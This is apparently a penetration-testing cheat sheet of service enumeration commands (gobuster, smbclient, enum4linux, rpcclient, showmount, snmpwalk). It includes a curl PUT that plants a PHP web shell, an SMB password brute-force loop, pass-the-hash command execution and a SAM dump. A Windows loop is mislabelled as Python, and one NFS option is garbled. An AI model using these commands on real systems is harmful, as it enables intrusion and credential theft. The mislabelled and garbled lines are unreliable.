I"F<h1 id="enumeration">Enumeration</h1>

<h2 id="brute-force-directorypagesfiles">Brute force directory/pages/files</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gobuster <span class="nb">dir</span> <span class="nt">-e</span> <span class="nt">-u</span> 172.16.1.10/ <span class="nt">-w</span> /usr/share/wordlists/dirb/big.txt <span class="nt">-s</span> <span class="s2">"200,301,302,401"</span> <span class="nb">.</span>

gobuster <span class="nb">dir</span> <span class="nt">-e</span> <span class="nt">-u</span> http://172.16.1.10/turismo <span class="nt">-w</span> /usr/share/wordlists/dirb/small.txt <span class="nt">-x</span> .php,.txt,.sql,.bkp  <span class="c">#Search by extensions.</span>

gobuster <span class="nb">dir</span> <span class="nt">-e</span> <span class="nt">-u</span> 192.168.0.7 <span class="nt">-w</span> wordlist <span class="nt">-x</span> .php <span class="nt">-c</span> cookie <span class="c"># Pass cookie</span>
</code></pre></div></div>

<p>Another tools:</p>
<ul>
  <li>Dirsearch</li>
  <li>Dirb</li>
  <li>Dirbusters</li>
</ul>

<p>File extensions to search:
    - Web :.pl,.cgi,.sh,.php,.jsp,.asp,.aspx,.js,.html,.nm
    - Backups:.bkp,.bak,.sql
    - Files:.pdf,.txt,.conf,.xml</p>

<p>Robots.txt/sitemap.xml are importants file that contains directories that are not indexed.</p>

<h2 id="methods-allowed">Methods allowed</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-v</span> <span class="nt">-X</span> OPTIONS http://172.16.1.10/ <span class="c"># Will show all methods</span>
</code></pre></div></div>

<p>Put method</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-v</span> <span class="nt">-X</span> PUT <span class="nt">-d</span> <span class="s2">"&lt;?php system(</span><span class="se">\$</span><span class="s2">_GET["</span>cmd<span class="s2">"]); ?&gt;"</span> http://172.16.1.10/webdav/shell.php
</code></pre></div></div>

<h2 id="ftp">FTP</h2>
<p>Commons credentials:</p>
<ul>
  <li>User:anonymous, pass:anonymous</li>
</ul>

<h2 id="smb">SMB</h2>
<p>Permit share directories and files. Port 139 -&gt; NetBIOS, port 445 -&gt; SMB over TCP
Links:</p>
<ul>
  <li><a href="https://book.hacktricks.xyz/pentesting/pentesting-smb">Hacktricks SMB</a></li>
</ul>

<h3 id="windows">Windows</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nbtstat <span class="nt">-A</span> 172.16.1.4 <span class="c"># show name, group, etc...</span>

net view <span class="se">\\</span>172.16.1.5 <span class="c"># Try to connect</span>

net view <span class="se">\\</span>172.16.1.5 <span class="s2">""</span> u:<span class="s2">""</span> <span class="c"># Null session logon</span>

net use h: <span class="se">\\</span>172.16.1.5<span class="se">\o</span>pt <span class="c"># Mount the folder in h:</span>

nbtstat <span class="nt">-c</span> <span class="c"># Cache of all old connections</span>
</code></pre></div></div>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#Python brute force
</span><span class="k">for</span> <span class="o">/</span><span class="n">f</span> <span class="o">%</span><span class="n">i</span> <span class="ow">in</span> <span class="p">(</span><span class="n">passwords</span><span class="p">.</span><span class="n">txt</span><span class="p">)</span> <span class="n">do</span> <span class="n">net</span> <span class="n">use</span> \\<span class="mf">172.16</span><span class="p">.</span><span class="mf">1.4</span> <span class="o">%</span><span class="n">i</span> <span class="o">/</span><span class="n">u</span><span class="p">:</span><span class="n">john</span>
</code></pre></div></div>

<h3 id="linux">Linux</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nbtscan <span class="nt">-r</span> 172.16.1.0/24 <span class="c"># Search in range</span>

smbclient  <span class="nt">-L</span> <span class="se">\\</span>172.16.1.5 <span class="nt">-N</span> <span class="c"># Connect in anonymous mode</span>

smbclient   //172.16.1.5/_DOCS <span class="nt">-N</span> <span class="c"># Connect in a directory</span>

smbclient  <span class="nt">-L</span> <span class="se">\\</span>172.16.1.5 <span class="nt">-N</span> —option<span class="o">=</span><span class="s1">'client min protocol=NT1'</span> <span class="c"># Sometimes can have a version incompatibility with older versions</span>

crackmapexec smb 192.168.10.11 <span class="nt">-u</span> Administrator <span class="nt">-H</span> &lt;NTHASH&gt; <span class="nt">-x</span> <span class="nb">whoami</span> <span class="c">#Pass-the-Hash</span>
crackmapexec smb 192.168.10.11 <span class="nt">-u</span> Administrator <span class="nt">-p</span> <span class="s1">'password'</span> <span class="nt">-x</span> <span class="nb">whoami</span> <span class="c">#Execute cmd</span>
crackmapexec smb &lt;IP&gt; <span class="nt">-d</span> &lt;DOMAIN&gt; <span class="nt">-u</span> Administrator <span class="nt">-p</span> <span class="s1">'password'</span> <span class="nt">--sam</span> <span class="c">#Dump SAM</span>
</code></pre></div></div>
<p>Automatic enumeration : <a href="https://github.com/CiscoCXSecurity/enum4linux">enum4linux</a></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>enum4linux <span class="nt">-U</span> 172.16.1.5 <span class="c"># Without users</span>

enum4linux <span class="nt">-a</span> 172.16.1.5 <span class="c"># All</span>
</code></pre></div></div>
<h2 id="rpc-remote-proccedure-call">RPC Remote proccedure call</h2>
<p>API to call commands in another machines.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rpcclient <span class="nt">-U</span> <span class="s2">""</span> <span class="nt">-N</span> 172.16.1.5 <span class="c"># Anonymous login</span>
<span class="c"># After connect</span>
enumdomusers <span class="c"># Enumerate users</span>
queryuser jonh
</code></pre></div></div>
<h2 id="nfs-network-file-system">NFS Network file system</h2>
<p>Protocol to share files. Port 2049</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rpcinfo <span class="nt">-p</span> 172.16.1.5 | <span class="nb">grep </span>nfs <span class="c"># Check versions</span>

showmount <span class="nt">-e</span> 172.16.1.5 <span class="c"># Show shared</span>

mount <span class="nt">-t</span> nfs <span class="nt">-o</span> <span class="nv">nfsverscat</span><span class="o">=</span>2 172.16.1.5:/ /tmp/nfs <span class="c">#Mount the nfs</span>
</code></pre></div></div>

<h2 id="snmp-simple-network-management-protocol">SNMP Simple Network Management protocol</h2>
<p>Protocol used to monitor different devices in the network (like routers, switches, printers, IoTs…). Ports: 161,162,10161,10162/UDP
Links:</p>
<ul>
  <li><a href="https://book.hacktricks.xyz/pentesting/pentesting-snmp">Hacktricks snmp</a></li>
  <li><a href="https://www.alvestrand.no/objectid/1.3.6.1.2">objectid list</a></li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>onesixtyone <span class="nt">-c</span> comu.txt 172.16.1.0/24 <span class="c"># Search by open hosts with communities</span>

snmpwalk <span class="nt">-c</span> public <span class="nt">-v1</span> 172.16.1.4 1.3.6.1.4.1.77.1.2.25  <span class="c"># Search with public community and specific code</span>

snmp-check 172.16.1.4 <span class="nt">-c</span> public <span class="c"># Show info of host</span>
</code></pre></div></div>

<h2 id="waf-web-application-firewall">WAF Web application firewall</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>WAFW00F google.com
</code></pre></div></div>
:ET